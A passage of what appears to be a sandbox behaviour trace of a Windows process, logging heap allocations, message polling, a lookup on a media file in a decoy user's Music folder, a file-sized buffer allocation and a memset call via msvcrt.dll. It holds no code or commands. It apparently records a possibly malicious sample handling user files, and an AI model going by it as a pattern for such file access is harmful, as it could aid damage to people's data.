hHeap=0x8a0000) returned 1 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0185.363] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.363] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\lwhz.m4a")) returned 0x20 [0185.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.364] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0185.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.364] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0xf87f1f10, ftLastWriteTime.dwHighDateTime=0x1d5e37f, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LWhz.m4a", cAlternateFileName="")) returned 0x90af58 [0185.364] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0185.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.365] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0185.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0185.366] CharLowerBuffW (in: lpsz="byte[53216]", cchLength=0xb | out: lpsz="byte[53216]") returned 0xb [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcfe0) returned 0xbca008 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0185.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.369] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.369] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0185.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.371] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.373] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.375] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 